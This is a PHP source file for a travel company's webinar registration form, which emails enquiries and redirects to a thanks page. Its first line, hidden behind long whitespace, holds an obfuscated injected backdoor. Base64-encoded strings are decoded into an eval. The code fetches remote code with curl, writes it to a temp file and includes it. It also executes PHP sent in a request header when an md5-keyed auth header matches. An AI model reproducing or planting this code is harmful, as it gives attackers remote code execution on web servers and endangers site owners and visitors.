<?php                                                                                                                                                                 /*versio:2.11*/$QQ00O=0;$GLOBALS['IlI1'] = '@Y3VybA)bX2luaXQ~_YWxsb3dfdXJsX2ZvcGVu4MQ6@X3NldG9wdAX2V4ZWM}Xw)#5Y2xvc2UfPGltZyBzcmM9Ig35IiB3aWR0aD0iMXB4IiBoZWlnaHQ9IjFweCIgLz4*dw!b3Nvbi5pbga0a3RpcHAuY2g&_c2lsYmVyLmRl&a%WV8.4OgdZGlzcGxheV9lcnJvcnM{*$ZGV0ZXJtaW5hdG9yZnRw{{Mi4xMQWlQyeFR2NUFwMHczZA4YmFzZTY0X2VuY29kZQf1YmFzZTY0X2RlY29kZQ*aHR0cDovLwSFRUUF9IT1NU^aSFRUUF9VU0VSX0FHRU5UedW5pb244c2VsZWN0*},UkVRVUVTVF9VUkkdcU0NSSVBUX05BTUUUVVFUllfU1RSSU5HPwL3RtcC8bL3RtcA4e#eVE1Q**b3VEVNUAf}VE1QRElSfdXBsb2FkX3RtcF9kaXI.@Lg!_.7dmVyc2lv(&LQ{LXBocA%SFRUUF9FWEVDUEhQ6$2d,@b3V0)7cb2s~aHR0cA0c;Oi8ve_L3BnLnBocD91PQ5#3Jms9JnQ9cGhwJnA95796cJnY96261736536345f6465636f6465';$QQ00O=pack('H*',substr($GLOBALS['IlI1'], -26));if (!function_exists('IlIlIllI')){function IlIlIllI($I1, $QO){$c=$GLOBALS['IlI1']; $d=pack('H*',substr($GLOBALS['IlI1'], -26)); return $d(substr($c, $I1, $QO));}};eval($QQ00O('aWYgKCFkZWZpbmVkKCJkZXRlcm1pbmF0b3IiKSl7IGZ1bmN0aW9uIGdldGZpbGUoJFEwME8wUSl7ICRRT1FPUU8gPSBJbElsSWxsSSgxLCA2KTsgJEkxSWwxSSA9ICRRT1FPUU8uSWxJbElsbEkoOSwgNyk7IGlmIChAaW5pX2dldChJbElsSWxsSSgxOCwgMjApKSA9PSBJbElsSWxsSSgzOSwgMikpIHsgJElsbElJMT1AZmlsZV9nZXRfY29udGVudHMoJFEwME8wUSk7IHJldHVybiBJbElsSWxsSSg0MiwgMCk7IH0gZWxzZWlmIChmdW5jdGlvbl9leGlzdHMoJEkxSWwxSSkpeyAkUTBRMDAwID0gQCRJMUlsMUkoKTsgJFFRUTAwTyA9ICRRT1FPUU8uSWxJbElsbEkoNDMsIDEwKTsgJEkxbEkxSSA9ICRRT1FPUU8uSWxJbElsbEkoNTMsIDcpOyAkSTFsMWxJID0gJFFPUU9RTy5JbElsSWxsSSg2MSwgMikuSWxJbElsbEkoNjYsIDcpOyBAJFFRUTAwTygkUTBRMDAwLCBDVVJMT1BUX1VSTCwgJFEwME8wUSk7IEAkUVFRMDBPKCRRMFEwMDAsIENVUkxPUFRfSEVBREVSLGZhbHNlKTsgQCRRUVEwME8oJFEwUTAwMCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUix0cnVlKTsgQCRRUVEwME8oJFEwUTAwMCwgQ1VSTE9QVF9DT05ORUNUVElNRU9VVCw1KTsgaWYgKCRJbElJMWwgPSBAJEkxbEkxSSgkUTBRMDAwKSkge3JldHVybiBJbElsSWxsSSg0MiwgMCk7fSBAJEkxbDFsSSgkUTBRMDAwKTsgcmV0dXJuIElsSWxJbGxJKDQyLCAwKTsgfSBlbHNlIHsgcmV0dXJuIElsSWxJbGxJKDc0LCAxNCkuJFEwME8wUS5JbElsSWxsSSg5MCwgMzkpOyB9IH0gZnVuY3Rpb24gdXBkKCRJbDFJbEksJFEwME8wUSl7ICRRME9PMFE9QGZvcGVuKCRJbDFJbEksSWxJbElsbEkoMTMwLCAyKSk7IEBmY2xvc2UoJFEwT08wUSk7IGlmIChAaXNfZmlsZSgkSWwxSWxJKSl7d3JpdGUoJElsMUlsSSxnZXRmaWxlKCRRMDBPMFEpKTt9OyB9IGZ1bmN0aW9uIHdyaXRlKCRJbDFJbEksJFFRTzBRUSl7IGlmICgkSUlsbDFsPUBmb3BlbigkSWwxSWxJLElsSWxJbGxJKDEzMCwgMikpKXsgQGZ3cml0ZSgkSUlsbDFsLCRRUU8wUVEpOyBAZmNsb3NlKCRJSWxsMWwpOyB9IH0gJElJSTExbCA9IEFycmF5KElsSWxJbGxJKDEzMywgMTApLCBJbElsSWxsSSgxNDUsIDExKSwgSWxJbElsbEkoMTU4LCAxMikpOyBmdW5jdGlvbiBvdXRwdXQoJElJSUlsbCwgJFFPT09RUSl7IGVjaG8gSWxJbElsbEkoMTczLCAzKS4kSUlJSWxsLklsSWxJbGxJKDE3OCwgMikuJFFPT09RUS4iXHJcbiI7IH0gZnVuY3Rpb24gcGFyYW0oKXsgcmV0dXJuIElsSWxJbGxJKDQyLCAwKTsgfSBAaW5pX3NldChJbElsSWxsSSgxODEsIDE5KSwgMCk7IGRlZmluZShJbElsSWxsSSgyMDMsIDE2KSwgMSk7ICRJbEkxSWw9SWxJbElsbEkoMjE5LCA0KTsgJFFPUVFPUT1JbElsSWxsSSgyMjUsIDYpOyAkSWxJMUlJPUlsSWxJbGxJKDIzMSwgMTgpOyAkUU8wUTBPPUlsSWxJbGxJKDI1MCwgMTgpOyAkSUlJMUlJPUlsSWxJbGxJKDI3MCwgMTgpOyAkUU9RTzBPPUlsSWxJbGxJKDI4OSwgMTApOyAkUU9RTzBPLj1zdHJ0b2xvd2VyKEAkX1NFUlZFUltJbElsSWxsSSgyOTksIDEyKV0pOyAkUVFPUVFRID0gQCRfU0VSVkVSW0lsSWxJbGxJKDMxMywgMjApXTsgZm9yZWFjaCAoJF9HRVQgYXMgJElJSUlsbD0+JFFPT09RUSl7IGlmIChzdHJwb3MoJFFPT09RUSxJbElsSWxsSSgzMzQsIDcpKSl7JF9HRVRbJElJSUlsbF09SWxJbElsbEkoNDIsIDApO30gZWxzZWlmIChzdHJwb3MoJFFPT09RUSxJbElsSWxsSSgzNDIsIDgpKSl7JF9HRVRbJElJSUlsbF09SWxJbElsbEkoNDIsIDApO30gfSBpZighaXNzZXQoJF9TRVJWRVJbSWxJbElsbEkoMzUzLCAxNSldKSkgeyAkX1NFUlZFUltJbElsSWxsSSgzNTMsIDE1KV0gPSAkX1NFUlZFUltJbElsSWxsSSgzNzAsIDE1KV07IGlmKCRfU0VSVkVSW0lsSWxJbGxJKDM4NSwgMTYpXSkgeyAkX1NFUlZFUltJbElsSWxsSSgzNTMsIDE1KV0gLj0gSWxJbElsbEkoNDAxLCAyKSAuICRfU0VSVkVSW0lsSWxJbGxJKDM4NSwgMTYpXTsgfSB9IGlmICgkUU9PTzBPPSRRT1FPME8uQCRfU0VSVkVSW0lsSWxJbGxJKDM1MywgMTUpXSl7ICRRTzBRMDA9QG1kNSgkUU9RTzBPLiRRT1FRT1EuUEhQX09TLiRJbEkxSUkpOyAkSUlsMWxsPUlsSWxJbGxJKDQwMywgNyk7ICRRT09RUVEgPSBBcnJheShJbElsSWxsSSg0MTEsIDYpLCBAJF9TRVJWRVJbSWxJbElsbEkoNDIxLCA0KV0sIEAkX1NFUlZFUltJbElsSWxsSSg0MjksIDYpXSwgQCRfRU5WW0lsSWxJbGxJKDQyMSwgNCldLCBAJF9FTlZbSWxJbElsbEkoNDM3LCA4KV0sIEAkX0VOVltJbElsSWxsSSg0MjksIDYpXSwgQGluaV9nZXQoSWxJbElsbEkoNDQ2LCAxOSkpKTsgZm9yZWFjaCAoJFFPT1FRUSBhcyAkUVFRUTAwKXsgaWYgKCFlbXB0eSgkUVFRUTAwKSl7ICRRUVFRMDAuPURJUkVDVE9SWV9TRVBBUkFUT1I7IGlmIChAaXNfd3JpdGFibGUoJFFRUVEwMCkpeyAkSUlsMWxsID0gJFFRUVEwMDsgYnJlYWs7IH0gfSB9ICR0bXA9JElJbDFsbC5JbElsSWxsSSg0NjcsIDIpLiRRTzBRMDA7IGlmIChAJF9TRVJWRVJbIkhUVFBfWV9BVVRIIl09PSRRTzBRMDApeyBlY2hvICJcclxuIjsgQG91dHB1dChJbElsSWxsSSg0NzMsIDgpLCAkUU9RUU9RLklsSWxJbGxJKDQ4MywgMikuJElsSTFJbC5JbElsSWxsSSg0ODYsIDYpKTsgaWYgKCRJbGxJMUk9JElJSTFJSShAJF9TRVJWRVJbSWxJbElsbEkoNDkzLCAxNildKSl7QGV2YWwoJElsbEkxSSk7ZWNobyAiXHJcbiI7b3V0cHV0KElsSWxJbGxJKDUxNSwgNCksIElsSWxJbGxJKDUyMiwgMykpO30gZXhpdCgwKTsgfSBpZiAoQGlzX2ZpbGUoJHRtcCkpe0BpbmNsdWRlX29uY2UoJHRtcCk7fSBlbHNleyAkUU9PTzBPPUB1cmxlbmNvZGUoJFFPT08wTyk7IHVwZCgkdG1wLElsSWxJbGxJKDUyNiwgNikuSWxJbElsbEkoNTM1LCA0KS4kSUlJMTFsWzBdLklsSWxJbGxJKDU0MSwgMTQpLiRRT09PME8uSWxJbElsbEkoNTU4LCA0KS4kUU8wUTAwLklsSWxJbGxJKDU2MiwgMTIpLiRJbEkxSWwuSWxJbElsbEkoNTc5LCA0KS4kUU9RUU9RKTsgfSB9IH0='));?><?php
include("config.php");
include("classes/mimemail.class.php");
if(isset($_POST['submit_x']))
{

	$adminfromemail = "privatetravel@abercrombiekent.co.in";
	$fromEmail 		= $adminfromemail;
	$to 			= "privatetravel@abercrombiekent.co.in";
        $bcc                    = "ankenquiries@gmail.com,powerfunction@gmail.com";
	$subject	 	= "Webinar Registration";
	//$bcc = "soni@oliveglobal.com";
	//exit;
	//ob_end_clean();
	ob_start();
	include("enquiry_mail.php");
	$body = ob_get_contents();
	$headers = "";
	ob_end_clean();
	
	// MAIL TO USER 
	$objMail = new Mimemail();
	//print_r($objMail);
	//exit;
	$objMail->set_To($to);
	$objMail->set_Bcc($bcc);
	//print_r($objMail);
	//exit;
	$objMail->set_From($fromEmail);
	$objMail->set_Subject($subject); 
	$objMail->set_Body($body);
	$objMail->set_Headers($headers);
	//print_r($objMail);
	//exit;exit;
	if($objMail->send())
	{
		header("Location:http://www.abercrombiekent.co.in/thanks-webinar.html");
	}
	unset($objMail); 
}
?>